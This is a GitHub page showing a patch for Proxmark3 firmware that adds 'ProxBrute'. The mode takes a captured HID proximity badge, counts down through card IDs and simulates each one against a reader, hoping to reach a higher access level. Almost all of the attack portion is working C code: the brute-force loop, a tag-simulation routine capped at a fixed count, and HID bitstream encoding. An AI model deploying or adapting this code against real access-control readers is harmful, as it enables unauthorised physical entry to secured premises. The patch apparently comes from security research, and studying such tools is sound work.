forked from DexterNano/proxbrute
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathproxbrute-r517.patch
247 lines (237 loc) · 9.4 KB
/
proxbrute-r517.patch
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
diff -uNr proxmark3-read-only//armsrc/appmain.c proxmark3-r517//armsrc/appmain.c
--- proxmark3-read-only//armsrc/appmain.c 2011-12-27 13:04:25.000000000 -0800
+++ proxmark3-r517//armsrc/appmain.c 2011-12-27 11:22:31.000000000 -0800
@@ -186,7 +186,7 @@
void MeasureAntennaTuning(void)
{
uint8_t *dest = (uint8_t *)BigBuf;
- int i, ptr = 0, adcval = 0, peak = 0, peakv = 0, peakf = 0;;
+ int i, ptr, adcval = 0, peak = 0, peakv = 0, peakf = 0;
int vLf125 = 0, vLf134 = 0, vHf = 0; // in mV
UsbCommand c;
@@ -363,6 +363,10 @@
int selected = 0;
int playing = 0;
+ // ProxBrute Stuff:
+ unsigned int i;
+ unsigned int ZERO=0x00000000;
+
// Turn on selected LED
LED(selected + 1, 0);
@@ -423,9 +427,48 @@
// wait for button to be released
while(BUTTON_PRESS())
WDT_HIT();
- Dbprintf("%x %x %x", selected, high[selected], low[selected]);
- CmdHIDsimTAG(high[selected], low[selected], 0);
- DbpString("Done playing");
+
+/* START PROXBRUTE */
+
+/*
+ ProxBrute - brad a. - foundstone
+
+ Following code is a trivial brute forcer once you read a valid tag
+ the idea is you get a valid tag, then just try and brute force to
+ another priv level. The problem is that it has no idea if the code
+ worked or not, so its a crap shoot. One option is to time how long
+ it takes to get a valid ID then start from scratch every time.
+*/
+
+ if ( selected == 1 ) {
+ DbpString("Entering ProxBrute Mode");
+ DbpString("brad a. - foundstone");
+ Dbprintf("Current Tag: Selected = %x Facility = %08x ID = %08x", selected, high[selected], low[selected]);
+ LED(LED_ORANGE,0);
+ LED(LED_RED,0);
+ for (i=low[selected]-1;i>ZERO;i--) {
+ if(BUTTON_PRESS()) {
+ DbpString("Told to Stop");
+ break;
+ }
+
+ Dbprintf("Trying Facility = %08x ID %08x", high[selected], i);
+ CmdHIDsimTAGProxBrute(high[selected], i, 0);
+ SpinDelay(500);
+ }
+
+ } else {
+ DbpString("Red is lit, not entering ProxBrute Mode");
+ Dbprintf("%x %x %x", selected, high[selected], low[selected]);
+ CmdHIDsimTAG(high[selected], low[selected], 0);
+ DbpString("Done playing");
+ }
+
+
+
+
+/* END PROXBRUTE */
+
if (BUTTON_HELD(1000) > 0)
{
DbpString("Exiting");
diff -uNr proxmark3-read-only//armsrc/apps.h proxmark3-r517//armsrc/apps.h
--- proxmark3-read-only//armsrc/apps.h 2011-12-27 13:04:25.000000000 -0800
+++ proxmark3-r517//armsrc/apps.h 2011-12-27 11:07:14.000000000 -0800
@@ -91,6 +91,11 @@
void AcquireTiType(void);
void AcquireRawBitsTI(void);
void SimulateTagLowFrequency(int period, int gap, int ledcontrol);
+// ProxBrute - created this function so that i didnt mess with anything
+// important - needed to only send a couple tags then goto next
+void SimulateTagLowFrequencyProxBrute(int period, int gap, int ledcontrol);
+void CmdHIDsimTAGProxBrute(int hi, int lo, int ledcontrol);
+
void CmdHIDsimTAG(int hi, int lo, int ledcontrol);
void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol);
void SimulateTagLowFrequencyBidir(int divisor, int max_bitlen);
diff -uNr proxmark3-read-only//armsrc/lfops.c proxmark3-r517//armsrc/lfops.c
--- proxmark3-read-only//armsrc/lfops.c 2011-12-27 13:04:25.000000000 -0800
+++ proxmark3-r517//armsrc/lfops.c 2011-12-27 13:04:05.000000000 -0800
@@ -484,6 +484,67 @@
}
}
+// ProxBrute - created this function so that i didnt mess with anything
+// important - needed to only send a set number of tags
+void SimulateTagLowFrequencyProxBrute(int period, int gap, int ledcontrol)
+{
+ int i;
+ int x=0;
+ uint8_t *tab = (uint8_t *)BigBuf;
+
+ FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_SIMULATOR);
+
+ AT91C_BASE_PIOA->PIO_PER = GPIO_SSC_DOUT | GPIO_SSC_CLK;
+
+ AT91C_BASE_PIOA->PIO_OER = GPIO_SSC_DOUT;
+ AT91C_BASE_PIOA->PIO_ODR = GPIO_SSC_CLK;
+
+#define SHORT_COIL() LOW(GPIO_SSC_DOUT)
+#define OPEN_COIL() HIGH(GPIO_SSC_DOUT)
+
+ i = 0;
+ x = 0;
+ for(;;) {
+ while(!(AT91C_BASE_PIOA->PIO_PDSR & GPIO_SSC_CLK)) {
+
+ if(BUTTON_PRESS() || x == 20000 ) {
+ DbpString("Stopped");
+ return;
+ }
+ WDT_HIT();
+ }
+
+ if (ledcontrol)
+ LED_D_ON();
+
+ if(tab[i])
+ OPEN_COIL();
+ else
+ SHORT_COIL();
+
+ if (ledcontrol)
+ LED_D_OFF();
+
+ while(AT91C_BASE_PIOA->PIO_PDSR & GPIO_SSC_CLK) {
+ if(BUTTON_PRESS() || x == 20000 ) {
+ DbpString("Stopped");
+ return;
+ }
+ WDT_HIT();
+ }
+ x++;
+ i++;
+ if(i == period) {
+ i = 0;
+ if (gap) {
+ SHORT_COIL();
+ SpinDelayUs(gap);
+ }
+ }
+ }
+}
+
+
/* Provides a framework for bidirectional LF tag communication
* Encoding is currently Hitag2, but the general idea can probably
* be transferred to other encodings.
@@ -780,6 +841,62 @@
LED_A_OFF();
}
+// ProxBrute - I know this is rediculous to do this
+void CmdHIDsimTAGProxBrute(int hi, int lo, int ledcontrol)
+{
+ int n=0, i=0;
+ /*
+ HID tag bitstream format
+ The tag contains a 44bit unique code. This is sent out MSB first in sets of 4 bits
+ A 1 bit is represented as 6 fc8 and 5 fc10 patterns
+ A 0 bit is represented as 5 fc10 and 6 fc8 patterns
+ A fc8 is inserted before every 4 bits
+ A special start of frame pattern is used consisting a0b0 where a and b are neither 0
+ nor 1 bits, they are special patterns (a = set of 12 fc8 and b = set of 10 fc10)
+ */
+
+ if (hi>0xFFF) {
+ DbpString("Tags can only have 44 bits.");
+ return;
+ }
+ fc(0,&n);
+ // special start of frame marker containing invalid bit sequences
+ fc(8, &n); fc(8, &n); // invalid
+ fc(8, &n); fc(10, &n); // logical 0
+ fc(10, &n); fc(10, &n); // invalid
+ fc(8, &n); fc(10, &n); // logical 0
+
+ WDT_HIT();
+ // manchester encode bits 43 to 32
+ for (i=11; i>=0; i--) {
+ if ((i%4)==3) fc(0,&n);
+ if ((hi>>i)&1) {
+ fc(10, &n); fc(8, &n); // low-high transition
+ } else {
+ fc(8, &n); fc(10, &n); // high-low transition
+ }
+ }
+
+ WDT_HIT();
+ // manchester encode bits 31 to 0
+ for (i=31; i>=0; i--) {
+ if ((i%4)==3) fc(0,&n);
+ if ((lo>>i)&1) {
+ fc(10, &n); fc(8, &n); // low-high transition
+ } else {
+ fc(8, &n); fc(10, &n); // high-low transition
+ }
+ }
+
+ if (ledcontrol)
+ LED_A_ON();
+ SimulateTagLowFrequencyProxBrute(n, 0, ledcontrol);
+
+ if (ledcontrol)
+ LED_A_OFF();
+}
+
+
// loop to capture raw HID waveform then FSK demodulate the TAG ID from it
void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol)
diff -uNr proxmark3-read-only//client/Makefile proxmark3-r517//client/Makefile
--- proxmark3-read-only//client/Makefile 2011-12-27 13:04:25.000000000 -0800
+++ proxmark3-r517//client/Makefile 2011-12-27 13:06:20.000000000 -0800
@@ -12,7 +12,7 @@
VPATH = ../common
OBJDIR = obj
-LDLIBS = -L/opt/local/lib -L/usr/local/lib -lusb -lreadline -lpthread
+LDLIBS = -L/opt/local/lib -L/usr/local/lib -lusb -lreadline -lpthread -lncurses
LDFLAGS = $(COMMON_FLAGS)
CFLAGS = -std=gnu99 -I. -I../include -I../common -I/opt/local/include -Wall -Wno-unused-function $(COMMON_FLAGS) -g -O3
diff -uNr proxmark3-read-only//common/Makefile.common proxmark3-r517//common/Makefile.common
--- proxmark3-read-only//common/Makefile.common 2011-12-27 13:04:25.000000000 -0800
+++ proxmark3-r517//common/Makefile.common 2011-12-27 11:29:17.000000000 -0800
@@ -65,7 +65,7 @@
INCLUDES = ../include/proxmark3.h ../include/at91sam7s512.h ../include/config_gpio.h ../include/usb_cmd.h $(APP_INCLUDES)
-CFLAGS = -c $(INCLUDE) -Wall -Werror -pedantic -std=gnu99 $(APP_CFLAGS)
+CFLAGS = -c $(INCLUDE) -Wall -pedantic -std=gnu99 $(APP_CFLAGS)
LDFLAGS = -nostartfiles -nodefaultlibs -Wl,-gc-sections -n
LIBS = -lgcc